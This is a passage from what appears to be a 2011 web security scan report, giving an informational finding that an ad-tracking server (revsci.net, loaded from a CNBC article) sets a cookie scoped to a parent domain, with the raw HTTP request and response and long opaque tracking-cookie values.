Cookie: NETID01=f6600bc0a97556506df2daf333d9f1f4; NETSEGS_H07707=82f4957c1a652091&H07707&0&4dfc9b6b&0&&4dd62389&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I07714=82f4957c1a652091&I07714&0&4e047730&0&&4ddc9a7b&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05539=82f4957c1a652091&K05539&0&4e047732&1&10592&4dddf043&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F07607=82f4957c1a652091&F07607&0&4e04773b&0&&4dddd39f&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_B08725=82f4957c1a652091&B08725&0&4e047743&0&&4dde0faf&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_E05516=82f4957c1a652091&E05516&0&4e047779&0&&4dddf225&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_G07608=82f4957c1a652091&G07608&0&4e04da55&4&10004,10009,10016,10017&4ddf3979&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_C07583=82f4957c1a652091&C07583&0&4e065339&0&&4de08ea4&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06543=82f4957c1a652091&A06543&0&4e091f12&0&&4de303e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05540=82f4957c1a652091&K05540&0&4e0bcd60&0&&4de5e0dc&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_L09855=82f4957c1a652091&L09855&0&4e0bd03c&0&&4de5b5e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06546=82f4957c1a652091&A06546&0&4e0d143b&0&&4de6f601&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F10931=82f4957c1a652091&F10931&0&4e0dae7d&0&&4de84145&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A09801=82f4957c1a652091&A09801&0&4e1ada42&0&&4df59bf8&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I09839=82f4957c1a652091&I09839&0&4e1adc15&0&&4df58b38&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_H07710=82f4957c1a652091&H07710&0&4e1adc2a&2&10055,10194&4df57f23&1f1a384c105a2f365a2b2d6af5f27c36; udm_0=MLv3NzMJZjpnHtrXN5qKIC+r++BQc/UqXr6jBV8rYdQ2D2XTncAIbXi2tfypgqfJvateR9HJ4U08Qnt4Q2fIWiATrGjjYlnmNAcpRXld8nmx6VM+uG+xOukp7j3BXwCS+Luv7Iuhg7/XvJ35U6jPutiAWAtPb3VwRE0DesH0KA0i0eMjcVNUP7mp7BMGp+B/EGjVdYGzWqUknsvKweFT+/IFuGMHAsu+afJ2kQXBxwEXEnI284PCB7hzurlburO7x14hGsWFzj8KUtk9jQcjtZkMIKSy3mn1V8am+dxz7UodZWG00rBYYRZ0cjlSDFYadKnlaFZl4WjQWkWRDqKEZH59Ut9twiQUx1iXCG8iFmI23cdID0H8ErMZAAE9/iEW5Yjc/hsRxFefezjBeBN1Ocjx3hzzVxkcq9wXVCW7v9gjbPES9RIEJjX6rn9tQMgTqBUTCp516rrWgoESvRqsitgEQSw3RmRhZBJdy4iqp4/JObA7C03jVIHHd/OgUUtxL0I0IbsQQqVUXpCGyO4rskRuwHM1KU/Jbepu/3y3XB4F9Lpy9Ufx6j6TSc6J96HphMM85TwXx7fD13QYz5YKzM2Txz12JQmdrq1UZPM96lln/Tfbv2urd8XVBeiI1PTpV/L69BK1Xr+RcfbDf0XR9SagilEdfA6T2TJyH9iMhcnhz1NWY+qhlDxMPSQaFcD6mD4u9+aPdPJnLGY78YS0lsmAzuY++q+UmVQ9O8MuuZfRn1viBcFYPPO/Ehb77dTJg0wIZ8rAgaA9RmflsAck2uy+gTZ349vcjqFpcMwaqqwB5WRmMPQJfweVMtTvWPkkuS9FWQ4pNWS5KxqAkGqf3hsSys/hL24QuN0Suhcm3H/ZLfDFTqH/XhIvPbQmPRq/T9/Oc+GUdIt7rL3IepeiBMujgm4x4y9De6/SXY/1G/dfg6gVmY7m2ZuGE7hYkw+0BL1/z3Zw9Hnzz70tcwPvezpWza85RkoiRR4+8BSNSbxgqdKTjuNKkY//8VMIWdyl4Z2G2dbxHMzBp97k+fXUncflugKR6WJ8lFLHcEzV81qBR501CzuBtIGsDgXjenf/x2WgwCSnHkndwCiBiUknGxwx+S2SpubYRjjXHCy9bwvmSmxTUa1b7VEsSrnPYypigb/zefKrVe0UPipLc5LkWDwWtg7FYvNKgWyrLb87NYz/h9VK0yntvka2xKvG4ZXqdf37tzjnNpWV2mpNmVbXTWnwQHwFdwd1rTkyP4UI2q6Kw6oi7YOb0U5adnK36hSUia4WXRH2RwYHsCn0svKj/kHV8m1eqgqrQs3jbnuX9y2EErURl7rwma3gtd6vJ/wuhcNtKGMY3enJXaQADSqbB0spsB4qUnmbZSLzuv8rqi9HbmRhdSm4YgYqeFLp+fAJwyT0LvsXIBVraanECinitRCiTcdsUjy+Iclhq+jG7T5SGgSZwhcwPfeyy8ger2ZfuAwEnnXpR8wMbYlvC194xV4LyY+q2jPozoQcLN4gSBMEGMEwQW6I05fTMiQJwrZSC/RUdb37nldhcv/9IDt9kHI9GPKzBVhEKgbqLPQFxzg45maBZPvKUGezRmdPo4ypTAmYk/f442D28FM08AcSOkW9r56J6aLrI8/7DOBzqz3qW0U6I7gh9MbOFpXcdo0Z0AZYacCAtKnx5lwhc0/3MJQtviHwhIF9xJZUcl5GaheXf4FEovMiK7s8zlGYnWDNAXdyBWOCn7utL6sxfF81wN9Lx/wXDh5B8xgAqQd5CojbH/a9VJDCKq6ASCHPQToFEBSV4oYY5ylpm4uijSLLmA+3NzrSUmfaX5StLZBQgT/162m/K8Xv8D/g1I5tSdEUSPPRbPD6PDTK+hieE+mG8gEYRqblqpGfYRizEg==; NETSEGS_E06560=82f4957c1a652091&E06560&0&4e1ee036&2&10654,10670&4df8474d&1f1a384c105a2f365a2b2d6af5f27c36; rtc_YxMN=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; rsiPus_j3RF="MLsXtSMNZzhvJZE469KkOkhRHfJm5qBSudNqQAMqTK+yvs0UNiAwl8R+cnLZYDAKvnoNKplM1SF6IV/GkJfNayZZbloBxTkjgYbl/TPadJHDh2P36iENFDxn8Tk+AoDE7qB5Pho1Mh8PR+o/X8fwTgwbejc3B/yiEXQfUZGO84fbk0+fg8ExypIlyzvHNNnXdCvoLIccLNNG9bHI+B/KA6emrwn3x9tyQMgxTwDwnSZiyIDfRizuhIR+X6SNEfCcDaaA2OgnJqQZNmO1ViZpHd6EIVqdaW7bE45mdO30PuHUE+aiEwELAvIuQUN0OMQeHkPsfODMCrPLuEXw3JeVb3UcK3UY1SpS0ZbUL+fBi6HOeZC+PbnFqGdzS8gG1uYty3cMAbE8D5trG0arU4MPFW6jZ/p2eBQVxLLUMz4Lf1Wl2lSav1Z+o6AQw74yYo0yJlT7V2+KPWwBpITUC/zegzRyPRgub+FiL1OGMfNCjQK1XRqikU7gK/awUIEvm6/Tseg65IV8USbpF9/0Jp+XdXGTwiVe8HzmsdBelBJ5GN7nEsEzb3CARE7Vxik2ODBUk+6ro2jrIR2cAhLfYC6YAlPIKU6TxauygsXDK5kkItuNhM4PKJgy2/5oSMg70bj0xkPGcm9JNXh0nQRdihG9H6K2NYEp41dyS7NXHJEuxr2/7XEAcnsSsTtYT4j0Zj5CFhDsYrk1Lhe2raFgbXvTa311udwRMQmCii6I9N7WzDRGjmEsrrgZvySqDrXTzSFOFLGIDLg52sUzas7ch9BLmAhZjNmARS9YPG9SxjBvUo5Ux6/mbnU3mquJAxLmCJuL2+pDZhiB9fDSMt9UgOLkd+qedrXAlQe4eI3K/oM99EXnwy/IDGXrGkkY8Er0oqgrRguqwV/LcALi/ApzREmzR7lQXO4eDMam5OfLbeuaBZws5pSPWA4JkHO+rf95eS0M7bSuR8byvDEPi/zn2Gt+Ow+BLgaAOhCWEnYp9sU2ATcJA/4RisMo8Dc78cQ9sbeakRZaujT2mBP3pRI7NX/oOGjF1uVm/e2cXlZ05M6xUuo8PiGFlVjugaEhi+FtMbMsTAt29ULuNyJYYA4zdlX2i8uN+nOatdTR0Oq5uXHDdEh1ODj/citz95Fr16+kwE2QFhKvI32z9SX/+OC2aEYrD6t6sipchSXN1VcOyrxdTw0KiFxKqjrbDWyUXxE+5pI7yT9J1Mr4jufvdAvNwuGrFlXtLkZ9dgVTWGRW3XRP7IBZbizL1wIHtTaOSQ7YndidEDA5zXytvsdKB/L5pfZycbLhFh7mO+K2K3heeTNinixhE0DMX7cnuoTgrkyLlC29x8IaoCw8My2/zRYAZ6cwOZDf4A=="; rsi_us_1000000="pUMN4ymnMBYY7dUqQhq1kDslvdL8/Y8tJ+gZNnYLLHe8d5Y1v0lUZEkxjU6512hl4rvflBtHCCV4j1aEyaWboNFsKbGpoii9wa0pHlrmGmrfqogM1y99swPy1q/Nr4hffWmq5ZLtixDjqVSuikDZb6s/r4A0ehWGs9HLtC5VbEfi1GT2WyG7Cz3Yuy/UQTJPrK9qDgUk3tfgk+Zwgho+601pZedaDJuXwM/IMp8wtmrLivFL5qGCmT3zz4z85PITklcV33PqnBvRJ5xz/p8LjOvneEDU3ssqH+iMsLJiwNrgsX0bH51XR0EZN9wOWy2m6hh80twOei4RlJvsUpLcncI04556Irq4INtIhRXZkYhtD+mGSDMZBWGj2QuARqRbCAb4o5onQrQbFGE7nmURosbpXGMb2NjJcUxbAgc5DSAdkXc2uQnLsQFnSz46Yx98x5TUDNp+9chajWMEmKbY0LbAsdsBJXjWNqvsPMCeuGf3aU6mwlgppzr8FKoeB1XMKbWQT4OgwTSn1/lyEjAowCsHcsIJ1FCEKyrhodIbQ1ldnGdli86lOhMhCmikbsky/AO9T9amFpvjziS9yBkkmzkRPle0mJtlIoPVILotlIOIBQeJeJ+gYNjEf404tc2zAQl6woBlSyhMbz7ckG+e5xoypD7pBcLzpUOFSxyYvWeN9gOx0b7rEcc2L8uWArYyedxQzIGI5T9s5WfdWjTTunQUNsvJmCHvBbygsJzwyMo+6sAuBL0l+1zXbUmHjfuUEX7bXXeIVjeejvpKDybPh0Fu0LvV/iTQ+VFNuMcan50IvUU6HR+igFlzDgtH/e6vUxQHP1dxBJZ5kUPhPFUAZqAie3V/jge7uvrgpxkp/x2CQ+hkPVNW2EjnMU77XaSRMhrN/HxrRF+AnH5BJ8USrrubV2etFGYmT1G0wAItVkLE4+lpK26M/MX0U5/CTWhQ5KjEl2FNy2eAqHOP3v4jjKHxYqeBW+COmZ7S1ehqgc9HoKnehot7rgEfKcW0vnttm2fBzwQ7eO2zi78i67NFUHNvXitAHTTzKdhayUDhyL9HQIIA7FsnUI9616D37mVQdk1p3yHGyrGWGOaI9HT7vCxCo7k5d+OI4lYCPdc1iC1sQWB1LzWEBxeaH9WUbUBGp639+sHM+OBnDvu5auPpccdIDBBS2MqQDN7Q2r4ArX6rcr+ZtRvYmTkBbOpBB6kVs51ihdH1MQC/WI1LrKiw2f0FjAR9kObWqtZaUF/UuTkcrFGFgk2WMVQ5rlNWzeYHTvdC5De7wble82NgL75dbCmDwvdLYkVwvBPevQihhBbmYHaGivAhNLCkhkM2lcd1XadQ5ixbbHOEeOxZ/DujoxlHjYcUvl3lRf1JVPKnL7JbqSnq73hTMSEgtGC28CNTzd34wSfNOg5ydw7NxSXD3nQctEoDns0Tk5ZbBWOweIl3Zq9cfvwIuiV2uX/idB4jhzg4JebjZ774LSV6xP+redbMdzWAjZCj47zcAMo49Wb+5BfYTS88fphDdQ4Ig9euig3NPEiqwNrPZoqdOzaC2XRKz3hriUqBk77181Khq98k4eYhqeQtUo1jmrzmopntzM0N0mNzD7FuICvy5VJclYbydw1TC9cHxvcH70L9fxiLlGIVBiXGuu10wvysdzcpappO9jSyN6skIOSnSZ1bxqCT9mlbWFcSNTgHxKfw5VHAXWEoctv4x841XORJpRcgEaAfPfTfss+Q0PN655dTHslgrPd+QHLEspmzcupDsuXJr0xZDMshzHBbgo1e4jJv4iM="; rsi_segs_1000000=pUPF5EOhOAMMpzaxu2F29vz47ssdu65JwXolocE02QQ4O3XYcv0liHtqFncA2iMgL2Isw+1QuRC+LDb2WDbWjIKteif4fOffjX8iq0xsqPPwv6rrUdcIwSmkFGWlAUMTmYjtIJpyfP4P6/Ql+5VXlxUvEZyBSFKUS4KkscCmnNeYCSMGrDrUf+BvgDGGbJFLjv17SZArUcRrC7uZVBYf4XW1pSfuKp6homnlrYgI1lp22zIsyNkdhnNKnrEKsMyBociG9/gt1DufcmMnyXml/xjnb7uFuW4VoPMppnSwim9r6odqXRiNyRiQw5vqCJUlmhuWrpw0qk/Om67P/YfBbxgZ/oX6fGJsqyzcR/s7HNqqIFQoegSMiz9MU22b/ibAh75qAWG29HsiMNuwtnwDdBIcfhxy293i8+zNY4y8Ttymas/oUcig8E/4b9G8j5DdCTLfk14MRZ9ASkboMOM3BEJeQRZosENpoQ46ALYwsCfT2Mzy/hFzYV7wtftNlz7Mx5pNj4Rm+Y6hJvBekk+4l14byoUFEdyDwUngYJrPux4v1Hexy93VVqa871tg4MvKPx1BPEVWDbuvGzcs1zD4jm+a/t6XcuNTy3hG0Buua9BXdEAFnd2nBXZHGWp8nvfN2lu2Ml1PAWsW8Ri/XyYZQh8WO/03

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs__1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPF5MOhOXMMpzaBv3Bh9uz8rvh2rOfqkHGdHHnLYyViGymJW18v6pxo9TQQ/CMgK6G8jF0HnU6SSkHFIHZYBIkHWaCW/4z8aSiyg0TBnt14JwP+YaUQ4WilEZa1mbBjW7OLLoFHNs08LFTYabxkEEVPU2c06DjOYyj3SuXjsHKw1HvrO7ZFiKShbeX4nTABONWLPoErccRrS7uZVBYf4XW1pSftKp6homnlrYgI1lp22zIsyNkdhnVKrDbFyV2uJv/1BmUlBKwDFWqjTCpvCBZbLtKKzv6WltjQ7pWUjMNH+30I2YuP5FFcJfLwMN3eawf2+KLTThx0xTTlYHzawZQXdaHyUF1KXX9ZUQI1rnykVwY0b8NIDFThSHpzPg/1KsPTtEbccXni5KjMfY2uitH8+9UVMO+wju4WEeuZFr4ZxtKSPrxl9yaWlHQGXxBEq6kSbP3BW+WtxMJfXNIYt8JI870HCMovZvWZcKlAgNqH/8UCkWVUlX3IzKU4Rt4+5EdE6wRZEwMhtqkV8tVecrz8zYDPirBQcdZhw+eLiA+vKf8IaWxJPZ0zUN9N+mZU45BtmrY1IhSHSQw8NLNwnCnp3GjAE5o+UShCE83doE5nPJB7rUvLssOKNIlrz9NOW8lII41Z0J/UMg+tZ6lcs2oKNN8=; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 15:52:11 GMT; Path=/
X-Proc-ms: 1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Content-Length: 145
Date: Thu, 16 Jun 2011 15:52:10 GMT

/* Vermont 12.4.0-1262 (2011-05-26 11:09:14 UTC) */
rsinetsegs = [];
if(typeof(DM_onSegsAvailable)=="function"){DM_onSegsAvailable([],'i10985');}

10.146. http://pix04.revsci.net/I10985/b3/0/3/1008211/321200067.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/I10985/b3/0/3/1008211/321200067.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

rsi_segs_1000000=pUPF5MOhOXMMpzaBv3Bh9uzs22rMriQJ4Ym1N1EuC/pV+zq2jLxL9z1pFHcD2oMpIyt/lxMhTNumEx3FIHZeBImHWKCW/4z8aSiyg0TBnt14JwP+YaUQ4WilEZa0AbFjW9PtKIFHNv4PL1RUaJzrH2RPUn836DjPQ4L4Uubj0NaY9wI2GVl/GdrOMZ/Y+D7DfNeIzfEE3nvwziDXX9CzNUOZtt+UwJ4ENj88LMHK32+yHR2CfYwWmRtEdrfVZpwkrg+Sti3jYb16vkgNMv/DKSvNtqpQ3ouyotNJqnSwTH9pyof7RRAFyoe8qE/qSmTRbvNjMxkdYEeYuQcwicjtUZzfO2tWeeW9DbFUkE3KIrgqiGYornVEiz1OU84Rr4srcj33Q4Rz6lHqJMmuBS33n3/zpEOEBfycxar9lEB6PcW6WYJNfQr6xk587qz6i6ZqBG6s7it+ux+euNMethetarg55J1GgGpAz+A6YCKx77wOIpIiOv7fks8hSdzNpwUI1yOq8D840Is1Y4bGzaaV2HAzES7hMbIMbuVH6Uih8aDMyGfgcZP9qFLRSStfA5T2fzA038WznlvEGRiw/5mSy4Znt1LdQM07Z506FXv/3DdbxtEhIVP+TgW5oribh1MJ++eCSrdPtS48Sgum0nh1QxE//f0z; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 13:07:24 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /I10985/b3/0/3/1008211/321200067.js?D=DM_LOC%3Dhttp%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860%253F_rsiL%253D0%26DM_REF%3Dhttp%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860%26DM_EOM%3D1&C=I10985 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=f6600bc0a97556506df2daf333d9f1f4; NETSEGS_H07707=82f4957c1a652091&H07707&0&4dfc9b6b&0&&4dd62389&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I07714=82f4957c1a652091&I07714&0&4e047730&0&&4ddc9a7b&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05539=82f4957c1a652091&K05539&0&4e047732&1&10592&4dddf043&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F07607=82f4957c1a652091&F07607&0&4e04773b&0&&4dddd39f&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_B08725=82f4957c1a652091&B08725&0&4e047743&0&&4dde0faf&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_E05516=82f4957c1a652091&E05516&0&4e047779&0&&4dddf225&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_G07608=82f4957c1a652091&G07608&0&4e04da55&4&10004,10009,10016,10017&4ddf3979&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_C07583=82f4957c1a652091&C07583&0&4e065339&0&&4de08ea4&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06543=82f4957c1a652091&A06543&0&4e091f12&0&&4de303e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05540=82f4957c1a652091&K05540&0&4e0bcd60&0&&4de5e0dc&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_L09855=82f4957c1a652091&L09855&0&4e0bd03c&0&&4de5b5e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06546=82f4957c1a652091&A06546&0&4e0d143b&0&&4de6f601&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F10931=82f4957c1a652091&F10931&0&4e0dae7d&0&&4de84145&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A09801=82f4957c1a652091&A09801&0&4e1ada42&0&&4df59bf8&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_E06560=82f4957c1a652091&E06560&0&4e1adad3&9&10133,10640,10654,10670,10448,10450,10451,10452,10454&4df43073&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I09839=82f4957c1a652091&I09839&0&4e1adc15&0&&4df58b38&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_H07710=82f4957c1a652091&H07710&0&4e1adc2a&2&10055,10194&4df57f23&1f1a384c105a2f365a2b2d6af5f27c36; udm_0=MLv3NzMJZjpnHtrXN5qKIC+r++BQc/UqXr6jBV8rYdQ2D2XTncAIbXi2tfypgqfJvateR9HJ4U08Qnt4Q2fIWiATrGjjYlnmNAcpRXld8nmx6VM+uG+xOukp7j3BXwCS+Luv7Iuhg7/XvJ35U6jPutiAWAtPb3VwRE0DesH0KA0i0eMjcVNUP7mp7BMGp+B/EGjVdYGzWqUknsvKweFT+/IFuGMHAsu+afJ2kQXBxwEXEnI284PCB7hzurlburO7x14hGsWFzj8KUtk9jQcjtZkMIKSy3mn1V8am+dxz7UodZWG00rBYYRZ0cjlSDFYadKnlaFZl4WjQWkWRDqKEZH59Ut9twiQUx1iXCG8iFmI23cdID0H8ErMZAAE9/iEW5Yjc/hsRxFefezjBeBN1Ocjx3hzzVxkcq9wXVCW7v9gjbPES9RIEJjX6rn9tQMgTqBUTCp516rrWgoESvRqsitgEQSw3RmRhZBJdy4iqp4/JObA7C03jVIHHd/OgUUtxL0I0IbsQQqVUXpCGyO4rskRuwHM1KU/Jbepu/3y3XB4F9Lpy9Ufx6j6TSc6J96HphMM85TwXx7fD13QYz5YKzM2Txz12JQmdrq1UZPM96lln/Tfbv2urd8XVBeiI1PTpV/L69BK1Xr+RcfbDf0XR9SagilEdfA6T2TJyH9iMhcnhz1NWY+qhlDxMPSQaFcD6mD4u9+aPdPJnLGY78YS0lsmAzuY++q+UmVQ9O8MuuZfRn1viBcFYPPO/Ehb77dTJg0wIZ8rAgaA9RmflsAck2uy+gTZ349vcjqFpcMwaqqwB5WRmMPQJfweVMtTvWPkkuS9FWQ4pNWS5KxqAkGqf3hsSys/hL24QuN0Suhcm3H/ZLfDFTqH/XhIvPbQmPRq/T9/Oc+GUdIt7rL3IepeiBMujgm4x4y9De6/SXY/1G/dfg6gVmY7m2ZuGE7hYkw+0BL1/z3Zw9Hnzz70tcwPvezpWza85RkoiRR4+8BSNSbxgqdKTjuNKkY//8VMIWdyl4Z2G2dbxHMzBp97k+fXUncflugKR6WJ8lFLHcEzV81qBR501CzuBtIGsDgXjenf/x2WgwCSnHkndwCiBiUknGxwx+S2SpubYRjjXHCy9bwvmSmxTUa1b7VEsSrnPYypigb/zefKrVe0UPipLc5LkWDwWtg7FYvNKgWyrLb87NYz/h9VK0yntvka2xKvG4ZXqdf37tzjnNpWV2mpNmVbXTWnwQHwFdwd1rTkyP4UI2q6Kw6oi7YOb0U5adnK36hSUia4WXRH2RwYHsCn0svKj/kHV8m1eqgqrQs3jbnuX9y2EErURl7rwma3gtd6vJ/wuhcNtKGMY3enJXaQADSqbB0spsB4qUnmbZSLzuv8rqi9HbmRhdSm4YgYqeFLp+fAJwyT0LvsXIBVraanECinitRCiTcdsUjy+Iclhq+jG7T5SGgSZwhcwPfeyy8ger2ZfuAwEnnXpR8wMbYlvC194xV4LyY+q2jPozoQcLN4gSBMEGMEwQW6I05fTMiQJwrZSC/RUdb37nldhcv/9IDt9kHI9GPKzBVhEKgbqLPQFxzg45maBZPvKUGezRmdPo4ypTAmYk/f442D28FM08AcSOkW9r56J6aLrI8/7DOBzqz3qW0U6I7gh9MbOFpXcdo0Z0AZYacCAtKnx5lwhc0/3MJQtviHwhIF9xJZUcl5GaheXf4FEovMiK7s8zlGYnWDNAXdyBWOCn7utL6sxfF81wN9Lx/wXDh5B8xgAqQd5CojbH/a9VJDCKq6ASCHPQToFEBSV4oYY5ylpm4uijSLLmA+3NzrSUmfaX5StLZBQgT/162m/K8Xv8D/g1I5tSdEUSPPRbPD6PDTK+hieE+mG8gEYRqblqpGfYRizEg==; rtc_622X=MLvP+AUpZjhn51LJq1jL5845H+4h/q9mFV9PWLgeObIq1v2MeP5Su//CLAsUHtmnDZXK4kSQZQCIxDLsR0aEsBkGAsAzyTZljGHlJ8F8pLRBWXWXz7uFg34VRrvprhNnTJS7l1KD/AemqQQKvgpBrRu6zRd1PlS4lphnBRJBpeskwJoJmbZKeWobkSjufE271gNxb+vGjpijOYcghljOgfhUWq8PpR1yEVDMy+oW7gwkTGdIaRb6g/Xq3Or30JpAH2dHGwxBt0ipA9YKJjFMVIZQK31V1QLJY0/26hIsE0r9Jq+U0jFDM/NxHHaSZrJo9jHW4r5oucRHKSlX8y/cc5KrAbuSKW/UMZEcYXOHxOjzyRZCXEzvqvzF3r/dsstyGLDiA6mhH9UjuQXGSKL5gdR50WkiE5eSfxrzly+vmBebaEkqdS4Gt7Yt0uwjKC295XiU5zdDo2Sny2SsB2meLIHZZNxHHFrzCdI6NLvUFHThiQN093VeOmPJHX/XooE0PamnIXSjhrlGOxxXMhuvciB4rr4mvBDDx8KEL/CMPFEXJ+bmV9F4eIlMMCRCVkuaijphBwE1gD7yspVEFRMCIOPIGS3ZVC4YtTnEi/ZObMue9LKYS4GadB2QjoSz+eeZZScmGcx/7Qvx2LEpDrvmu0NwyrPG+al+u1+tsZFublJ1hzSK